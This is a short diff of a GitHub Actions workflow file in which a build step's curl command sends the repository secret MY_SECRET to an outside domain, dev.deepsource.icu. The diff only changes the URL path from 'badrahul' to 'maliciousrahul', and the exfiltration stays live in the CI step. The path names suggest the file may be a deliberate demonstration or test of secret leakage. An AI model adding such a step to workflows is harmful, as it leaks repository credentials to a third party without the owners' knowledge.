diff --git a/.github/workflows/blank.yml b/.github/workflows/blank.yml index 161a5fa..52f368e 100644 --- a/.github/workflows/blank.yml +++ b/.github/workflows/blank.yml @@ -32,6 +32,6 @@ jobs: # Runs a set of commands using the runners shell - name: Run a multi-line script run: | - curl https://dev.deepsource.icu/badrahul?next=${{ secrets.MY_SECRET }} + curl https://dev.deepsource.icu/maliciousrahul?next=${{ secrets.MY_SECRET }} echo Add other actions to build, echo test, and deploy your project.